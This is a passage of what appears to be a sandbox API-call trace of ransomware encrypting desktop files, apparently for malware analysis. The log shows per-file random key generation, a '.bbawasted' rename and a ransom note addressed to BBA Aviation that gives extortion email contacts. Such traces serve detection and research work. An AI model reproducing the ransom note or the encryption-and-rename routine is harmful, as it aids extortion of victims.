KEY:\r\n[begin_key]RPAr584WoiTG+6PTCMfQhRbdzvJe6UfsmaJJ5cQV9Gxf9ftW8n3FjWWefDspd3qy\r\nYBRj8Bm/z+ApQrlWcBHt5LdkJf1bkP6wIKdxqm8gCvQFwkbG7/anAiAAgeLoMzG1\r\n6XwaeyKVF1KitqzgcsBTKPSoy+/B8wLT5oTUbmTS4ufLzDfwGm0uFRb2gU2T80Cq\r\n1wrOwPktQBpfY2uy6hWawoZzK+d0Auo1XSlgPUrBUPxYgkrsiuoSiNUcFXtSYMyR\r\nWIArqOoj9/JnXMUubtJH8acECr8Nvp4aZxYfAcOgU0tdD3tj6OPtEAW4p7tl9pyM\r\no9UtAuEV0RQ+B7XZK0updlZwJkKPGywSu13HCa5dLiBw+bXEW5IMZ6KweM4CHc14\r\ncnulZaW/FbxiciGQgvcFNkawAdmGZqNSC/KvxL6pSXEtqJqsrXlM1eSnrPYXPCcS\r\nekGfCGNYd35SIT+F/cCLLA3EYaSpx7z+rCiso0eWPqbAfEx7pPmCLjDGLin4/nme\r\nf6RcqEbjZlXKfGpTszBwki4ezXY69uJWLWkh7ym2ehA6jC/Tr9xplWLNv+eRRG9Y\r\nBjZrvocq8k4YWt7axkffDu2+/dyycqVfyIEA0SsDWDCU/KJTLbtnLEQi16+06wv7\r\ng60y5dXHcTNzDPt6woDluUP2+QudvnZoA01AYDeLR0a=[end_key]\r\nKEEP IT\r\n") returned 984 [0209.328] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6aecf0 | out: hHeap=0x660000) returned 1 [0209.328] WriteFile (in: hFile=0x294, lpBuffer=0x6bb6f0*, nNumberOfBytesToWrite=0x7b0, lpNumberOfBytesWritten=0x147fef0, lpOverlapped=0x0 | out: lpBuffer=0x6bb6f0*, lpNumberOfBytesWritten=0x147fef0*=0x7b0, lpOverlapped=0x0) returned 1 [0209.329] SetEndOfFile (hFile=0x294) returned 1 [0209.331] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6bb6f0 | out: hHeap=0x660000) returned 1 [0209.331] CloseHandle (hObject=0x294) returned 1 [0209.546] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6c4b88 | out: hHeap=0x660000) returned 1 [0209.546] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6a2fc0 | out: hHeap=0x660000) returned 1 [0209.546] _aulldvrm () returned 0x0 [0209.546] CryptAcquireContextW (in: phProv=0x147fec4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fec4*=0x6a62c8) returned 1 [0209.547] CryptGenRandom (in: hProv=0x6a62c8, dwLen=0x48, pbBuffer=0x147ff00 | out: pbBuffer=0x147ff00) returned 1 [0209.547] CryptReleaseContext (hProv=0x6a62c8, dwFlags=0x0) returned 1 [0209.547] lstrlenW (lpString="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\sKPmyj3.m4a") returned 39 [0209.547] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x258) returned 0x6c4b88 [0209.547] lstrcpyW (in: lpString1=0x6c4bd6, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0209.548] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6bb6f0 [0209.548] CryptAcquireContextW (in: phProv=0x147fea0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fea0*=0x6a6350) returned 1 [0209.548] CryptGenRandom (in: hProv=0x6a6350, dwLen=0xa3a, pbBuffer=0x6bb6f0 | out: pbBuffer=0x6bb6f0) returned 1 [0209.548] CryptReleaseContext (hProv=0x6a6350, dwFlags=0x0) returned 1 [0209.548] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\sKPmyj3.m4a.bbawasted_info" (normalized: "c:\\users\\fd1hvy\\desktop\\skpmyj3.m4a.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x294 [0209.549] WriteFile (in: hFile=0x294, lpBuffer=0x6bb6f0*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0x147febc, lpOverlapped=0x0 | out: lpBuffer=0x6bb6f0*, lpNumberOfBytesWritten=0x147febc*=0xa3a, lpOverlapped=0x0) returned 1 [0209.550] SetEndOfFile (hFile=0x294) returned 1 [0209.551] SetFilePointer (in: hFile=0x294, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0209.551] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6bb6f0 | out: hHeap=0x660000) returned 1 [0209.551] lstrcpyW (in: lpString1=0x6c4bd6, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0209.551] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\sKPmyj3.m4a" (normalized: "c:\\users\\fd1hvy\\desktop\\skpmyj3.m4a"), lpNewFileName="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\sKPmyj3.m4a.bbawasted" (normalized: "c:\\users\\fd1hvy\\desktop\\skpmyj3.m4a.bbawasted")) returned 1 [0209.552] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\sKPmyj3.m4a.bbawasted" (normalized: "c:\\users\\fd1hvy\\desktop\\skpmyj3.m4a.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x280 [0209.552] CreateFileMappingW (hFile=0x280, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x27c [0209.552] GetFileSize (in: hFile=0x280, lpFileSizeHigh=0x147fe8c | out: lpFileSizeHigh=0x147fe8c*=0x0) returned 0x271e [0209.552] MapViewOfFile (hFileMappingObject=0x27c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x271e) returned 0x5f0000 [0209.552] CloseHandle (hObject=0x280) returned 1 [0209.561] UnmapViewOfFile (lpBaseAddress=0x5f0000) returned 1 [0209.561] CloseHandle (hObject=0x27c) returned 1 [0209.561] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x200) returned 0x689df0 [0209.562] CryptAcquireContextW (in: phProv=0x147fe7c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fe7c*=0x6a5e88) returned 1 [0209.563] CryptGenRandom (in: hProv=0x6a5e88, dwLen=0x1b8, pbBuffer=0x689e38 | out: pbBuffer=0x689e38) returned 1 [0209.563] CryptReleaseContext (hProv=0x6a5e88, dwFlags=0x0) returned 1 [0209.563] CryptAcquireContextW (in: phProv=0x147fbe4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fbe4*=0x6a6b48) returned 1 [0209.564] CryptGenRandom (in: hProv=0x6a6b48, dwLen=0x200, pbBuffer=0x147fc00 | out: pbBuffer=0x147fc00) returned 1 [0209.564] CryptReleaseContext (hProv=0x6a6b48, dwFlags=0x0) returned 1 [0209.577] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x403) returned 0x6aecf0 [0209.577] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x689df0 | out: hHeap=0x660000) returned 1 [0209.577] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6bb6f0 [0209.577] _snwprintf (in: _Dest=0x6bb6f0, _Count=0x51d, _Format="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]fAnHAhkQ9VeaGxkHP1d60mEX/h/icn5GqvYamw+mXwcQt2kLxgAtTS6FdgSWlEbF\r\n0sEQB6q2r4CqOb3Y5Mi9to1TceCcvb/PvyrfDJ1w4SqbA4VysUCpgrRnEMutKAKf\r\nwTMrdq9FmUFhU5/B1H/4tc1P4b5UQvZF6StGb6X7IBCU4dumGDWTIuFBLnpj6G6x\r\nwMyOjCB49Ffjrv1894C8Mf4MninxaSKFle/MweHHkikvhbuFJRbg/qv7cZtWgNqy\r\nNrPReVDYjq40ddqsYfQUUTEEp7r/IrldGEpiKIBkwQINvf/+3K41DtwRBCPc59x/\r\nKlP+fH7QAHSTSQ0HuXEM8aHTh0eL5eV7P0886AAfYb62Pqa/YcGhZjjSPqFZjzau\r\nNAYlayxuSSYGH9CKJ3fKofO4L5hDacdBiYOS+TAzC+8nuupuLIw0LssTdPa2Vd+P\r\nfxaFhxKd59+d13xs67Uyav+/YkaZMB2U8ZwkNYjZJMYrwLaFjxHz3sx1dN/NQI/D\r\nb2nA/uQs6/PqRXa+4ZWZnVvJSjzS9T+iNXSrT3xv4NUbDTyfltM8iJyeJe+FxFgT\r\nYu4iNgHobOfl8Ljc7o7XxSgboELJ3AKgccw3/Lmy4LWcQxXY37MOXqxeNUJJOf2V\r\nVKB3aduOtcbGVw4vyFF6dCWz8+Tdqbhzfbkn9zW3I86=[end_key]\r\nKEEP IT\r\n") returned 984 [0209.577] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6aecf0 | out: hHeap=0x660000) returned 1 [0209.577] WriteFile (in: hFile=0x294, lpBuffer=0x6bb6f0*, nNumberOfBytesToWrite=0x7b0, lpNumberOfBytesWritten=0x147fef0, lpOverlapped=0x0 | out: lpBuffer=0x6bb6f0*, lpNumberOfBytesWritten=0x147fef0*=0x7b0, lpOverlapped=0x0) returned 1 [0209.577] SetEndOfFile (hFile=0x294) returned 1 [0209.581] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6bb6f0 | out: hHeap=0x660000) returned 1 [0209.581] CloseHandle (hObject=0x294) returned 1 [0209.582] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6c4b88 | out: hHeap=0x660000) returned 1 [0209.583] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6a31b8 | out: hHeap=0x660000) returned 1 [0209.583] _aulldvrm () returned 0x0 [0209.583] CryptAcquireContextW (in: phProv=0x147fec4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fec4*=0x6a68a0) returned 1 [0209.584] CryptGenRandom (in: hProv=0x6a68a0, dwLen=0x48, pbBuffer=0x147ff00 | out: pbBuffer=0x147ff00) returned 1 [0209.584] CryptReleaseContext (hProv=0x6a68a0, dwFlags=0x0) returned 1 [0209.584] lstrlenW (lpString="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\sLj1uQw cmgJX20IgEhH.avi") returned 52 [0209.584] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x272) returned 0x6c4b88 [0209.584] lstrcpyW (in: lpString1=0x6c4bf0, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0209.584] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6bb6f0 [0209.584] CryptAcquireContextW (in: phProv=0x147fea0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fea0*=0x6a6570) returned 1 [0209.585] CryptGenRandom (in: hProv=0x6a6570, dwLen=0xa3a, pbBuffer=0x6bb6f0 | out: pbBuffer=0x6bb6f0) returned 1 [0209.585] CryptReleaseContext (hProv=0x6a6570, dwFlags=0x0) returned 1 [0209.585] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\sLj1uQw cmgJX20IgEhH.avi.bbawasted_info" (normalized: "c:\\users\\fd1hvy\\desktop\\slj1uqw cmgjx20igehh.avi.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x294 [0209.586] WriteFile (in: hFile=0x294, lpBuffer=0x6bb6f0*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0x147febc, lpOverlapped=0x0 | out: lpBuffer=0x6bb6f0*, lpNumberOfBytesWritten=0x147febc*=0xa3a, lpOverlapped=0x0) returned 1 [0209.588] SetEndOfFile (hFile=0x294) returned 1 [0209.588] SetFilePointer (in: hFile=0x294, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0209.589] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6bb6f0 | out: hHeap=0x660000) returned 1 [0209.589] lstrcpyW (in: lpString1=0x6c4bf0, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0209.589] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\sLj1uQw cmgJX20IgEhH.avi" (normalized: "c:\\users\\fd1hvy\\desktop\\slj1uqw cmgjx20igehh.avi"), lpNewFileName="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\sLj1uQw cmgJX20IgEhH.avi.bbawasted" (normalized: "c:\\users\\fd1hvy\\desktop\\slj1uqw cmgjx20igehh.avi.bbawasted")) returned 1 [0209.590] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\sLj1uQw cmgJX20IgEhH.avi.bbawasted" (normalized: "c:\\users\\fd1hvy\\desktop\\slj1uqw cmgjx20igehh.avi.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0209.590] CreateFileMappingW (hFile=0x27c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x280 [0209.794] GetFileSize (in: hFile=0x27c, lpFileSizeHigh=0x147fe8c | out: lpFileSizeHigh=0x147fe8c*=0x0) returned 0x16283 [0209.794] MapViewOfFile (hFileMappingObject=0x280, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x16283) returned 0x5f0000 [0209.794] CloseHandle (hObject=0x27c) returned 1 [0209.805] UnmapViewOfFile (lpBaseAddress=0x5f0000) returned 1 [0209.806] CloseHandle (hObject=0x280) returned 1 [0209.806] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x200) returned 0x689df0 [0209.806] CryptAcquireContextW (in: phProv=0x147fe7c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fe7c*=0x6a6ce0) returned 1 [0209.807] CryptGenRandom (in: hProv=0x6a6ce0, dwLen=0x1b8, pbBuffer=0x689e38 | out: pbBuffer=0x689e38) returned 1 [0209.807] CryptReleaseContext (hProv=0x6a6ce0, dwFlags=0x0) returned 1 [0209.807] CryptAcquireContextW (in: phProv=0x147fbe4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fbe4*=0x6a5e88) returned 1 [0209.807] CryptGenRandom (in: hProv=0x6a5e88, dwLen=0x200, pbBuffer=0x147fc00 | out: pbBuffer=0x147fc00) returned 1 [0209.807] CryptReleaseContext (hProv=0x6a5e88, dwFlags=0x0) returned 1 [0209.819] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x403) returned 0x6aecf0 [0209.819] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x689df0 | out: hHeap=0x660000) returned 1 [0209.819] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6bb6f0 [0209.819] _snwprintf (in: _Dest=0x6bb6f0, _Count=0x51d, _Format="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]JY2Mc0HaeNhBhAWZahMjRj8MNq8EF/O8qD2WGES8Q7Ed/coAyOz7YTRRNwpeOtM6\r\n57BJtkZ9IAl7lEkBCXiyix2rNCnrk1NFR57Y5mJ2l57KTcc4uJBw1zsDKJIyZjZv\r\nr654CPCFIqCOurmKk/VIE6tTuWKPwjSEY3w3yOQ6qAov+2qcrVYN/AJSupANxeEc\r\nh6xk7jriLbM6q4J/342bvl0XsYSVQPmtO5oHIuDk0hHPTZCUBtPqN0/FQDJayii1\r\nGx2agmiydz218P1HNZspRhuiRTmk5VpnbwA+YJnI6HEdGQx6R5KP6WRTpfKQWW7/\r\nBWJ5GQMQMbVzRT2d1n+pGpdaYYQXEiZP/JGpXpGEWc9UQHSVKEBIg8HeQW7RcSza\r\n2urW9ozv5O6+t/LHlc17rZOQzR6qy1/ME+obBIoJWzFO0wxHLJQle4x9jJCjLXSV\r\ndaBDgZmS7tnGPx+uzZxjoMuPhLpWfFn/7Tpc7KJPKZnDQRnFd45MtesyW+my6ZdU\r\nIjuLNw62CVwbShvKaxGj9eCfSgA9GabrKVMqffLLy0Y5f5tcIFqAl0A8MZw8hORv\r\nS318D51EHAw+nOkboCBJtq3vyZUEPMGkHhRuBJZ/Zxc+N2U3Qxl/05MV8qjRgZ8g\r\nLAKM3o5XGqEKvrSpiu2aK9xd5ljEOm/0a+euhZTRIeL=[end_key]\r\nKEEP IT\r\n") returned 984 [0209.819] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6aecf0 | out: hHeap=0x660000) returned 1 [0209.819] WriteFile (in: hFile=0x294, lpBuffer=0x6bb6f0*, nNumberOfBytesToWrite=0x7b0, lpNumberOfBytesWritten=0x147fef0, lpOverlapped=0x0 | out: lpBuffer=0x6bb6f0*, lpNumberOfBytesWritten=0x147fef0*=0x7b0, lpOverlapped=0x0) returned 1 [0209.820] SetEndOfFile (hFile=0x294) returned 1 [0209.823] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6bb6f0 | out: hHeap=0x660000) returned 1 [0209.823] CloseHandle (hObject=0x294) returned 1 [0210.028] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6c4b88 | out: hHeap=0x660000) returned 1 [0210.029] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b0b00 | out: hHeap=0x660000) returned 1 [0210.029] _aulldvrm () returned 0x0 [0210.029] CryptAcquireContextW (in: phProv=0x147fec4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fec4*=0x6a62c8) returned 1 [0210.030] CryptGenRandom (in: hProv=0x6a62c8, dwLen=0x48, pbBuffer=0x147ff00 | out: pbBuffer=0x147ff00) returned 1 [0210.030] CryptReleaseContext (hProv=0x6a62c8, dwFlags=0x0) returned 1 [0210.030] lstrlenW (lpString="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\wcrT-HU6VSvB0Tq.swf") returned 47 [0210.030] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x268) returned 0x6c4b88 [0210.030] lstrcpyW (in: lpString1=0x6c4be6, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0210.030] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6bb6f0 [0210.030] CryptAcquireContextW (in: phProv=0x147fea0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fea0*=0x6a5e88) returned 1 [0210.031] CryptGenRandom (in: hProv=0x6a5e88, dwLen=0xa3a, pbBuffer=0x6bb6f0 | out: pbBuffer=0x6bb6f0) returned 1 [0210.031] CryptReleaseContext (hProv=0x6a5e88, dwFlags=0x0) returned 1 [0210.031] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\wcrT-HU6VSvB0Tq.swf.bbawasted_info" (normalized: "c:\\users\\fd1hvy\\desktop\\wcrt-hu6vsvb0tq.swf.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x294 [0210.032] WriteFile (in: hFile=0x294, lpBuffer=0x6bb6f0*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0x147febc, lpOverlapped=0x0 | out: lpBuffer=0x6bb6f0*, lpNumberOfBytesWritten=0x147febc*=0xa3a, lpOverlapped=0x0) returned 1 [0210.033] SetEndOfFile (hFile=0x294) returned 1 [0210.034] SetFilePointer (in: hFile=0x294, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0210.034] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6bb6f0 | out: hHeap=0x660000) returned 1 [0210.034] lstrcpyW (in: lpString1=0x6c4be6, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0210.034] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\wcrT-HU6VSvB0Tq.swf" (normalized: "c:\\users\\fd1hvy\\desktop\\wcrt-hu6vsvb0tq.swf"), lpNewFileName="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\wcrT-HU6VSvB0Tq.swf.bbawasted" (normalized: "c:\\users\\fd1hvy\\desktop\\wcrt-hu6vsvb0tq.swf.bbawasted")) returned 1 [0210.035] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\wcrT-HU6VSvB0Tq.swf.bbawasted" (normalized: "c:\\users\\fd1hvy\\desktop\\wcrt-hu6vsvb0tq.swf.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x288 [0210.035] CreateFileMappingW (hFile=0x288, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x28c [0210.035] GetFileSize (in: hFile=0x288, lpFileSizeHigh=0x147fe8c | out: lpFileSizeHigh=0x147fe8c*=0x0) returned 0x188b [0210.035] MapViewOfFile (hFileMappingObject=0x28c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x188b) returned 0x610000 [0210.035] CloseHandle (hObject=0x288) returned 1 [0210.038] UnmapViewOfFile (lpBaseAddress=0x610000) returned 1 [0210.038] CloseHandle (hObject=0x28c) returned 1 [0210.038] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x200) returned 0x689df0 [0210.038] CryptAcquireContextW (in: phProv=0x147fe7c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fe7c*=0x6a64e8) returned 1 [0210.039] CryptGenRandom (in: hProv=0x6a64e8, dwLen=0x1b8, pbBuffer=0x689e38 | out: pbBuffer=0x689e38) returned 1 [0210.039] CryptReleaseContext (hProv=0x6a64e8, dwFlags=0x0) returned 1 [0210.039] CryptAcquireContextW (in: phProv=0x147fbe4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fbe4*=0x6a6130) returned 1 [0210.040] CryptGenRandom (in: hProv=0x6a6130, dwLen=0x200, pbBuffer=0x147fc00 | out: pbBuffer=0x147fc00) returned 1 [0210.040] CryptReleaseContext (hProv=0x6a6130, dwFlags=0x0) returned 1 [0210.050] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x403) returned 0x6aecf0 [0210.051] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x689df0 | out: hHeap=0x660000) returned 1 [0210.051] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6bb6f0 [0210.051] _snwprintf (in: _Dest=0x6bb6f0, _Count=0x51d, _Format="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]gDKmRtV7ejZK1PISNGCXKQJFYXcbIkg5IcVnakjYJfbkK+gZ9FYBzvspXKz92j4/\r\neFKCdbwTokFxJdHtccLD5L5jrR8FB0fgUgrMXiejjircS9x8AOLPv4BaQt/Ya795\r\ndtLPDGy4ExAGqhsvfEsJAmMS3raw9BIO4eII/ALl9WpPhOQmHRb1cnhBXdVRT3hS\r\nf1mM0CZ5BkxyTmk0I+ClJRzYe5plcjfvX+RSjib40YkHVzsEQoqcbDgUw/4NdkxW\r\nFbjVTSPf95Ka2O5cv+UsTKqyjKAc5AmRrlNuJP5Z5Uvkozld4d0/kjDWwFoU5ISq\r\n10MYYaNeRuHzJPvtoKmvv2xd/WDxdNtVwu8vpEjlRxtJXw+LQnKlmCT2GwQx4hVG\r\nhlQ2lFAyoHKa7Yb+8EpAmaWeDHcg7j7GE+h+dhea+NWr7xKOCMEE5/+daBK0Eex7\r\nKXlWWkj4EK9xTM/ZsdpEXngGEen58LDrjkr5NicJmOuis/wUVkaBPJW7FTr5LsWC\r\n0UGN18OSxW58L0P3BaBXND/tyStuqVy9SxHy59Gv4fPBsG4kNqy6vFzp12E82N3C\r\nzvZydtYElW4aTnUQH6LpQXJ7zOtfFGatTfPOC+9NRSejfKViBl7xpbbseKrTM0TW\r\n7ZwlBotSAzKRIBWJVHxjfvSsUbDwfU1y279sJk6c7/y=[end_key]\r\nKEEP IT\r\n") returned 984 [0210.051] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6aecf0 | out: hHeap=0x660000) returned 1 [0210.051] WriteFile (in: hFile=0x294, lpBuffer=0x6bb6f0*, nNumberOfBytesToWrite=0x7b0, lpNumberOfBytesWritten=0x147fef0, lpOverlapped=0x0 | out: lpBuffer=0x6bb6f0*, lpNumberOfBytesWritten=0x147fef0*=0x7b0, lpOverlapped=0x0) returned 1 [0210.051] SetEndOfFile (hFile=0x294) returned 1 [0210.054] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6bb6f0 | out: hHeap=0x660000) returned 1 [0210.054] CloseHandle (hObject=0x294) returned 1 [0210.356] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6c4b88 | out: hHeap=0x660000) returned 1 [0210.357] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6afba8 | out: hHeap=0x660000) returned 1 [0210.357] _aulldvrm () returned 0x0 [0210.357] CryptAcquireContextW (in: phProv=0x147fec4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fec4*=0x6a6790) returned 1 [0210.358] CryptGenRandom (in: hProv=0x6a6790, dwLen=0x48, pbBuffer=0x147ff00 | out: pbBuffer=0x147ff00) returned 1 [0210.358] CryptReleaseContext (hProv=0x6a6790, dwFlags=0x0) returned 1 [0210.358] lstrlenW (lpString="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\y6RqMI.wav") returned 38 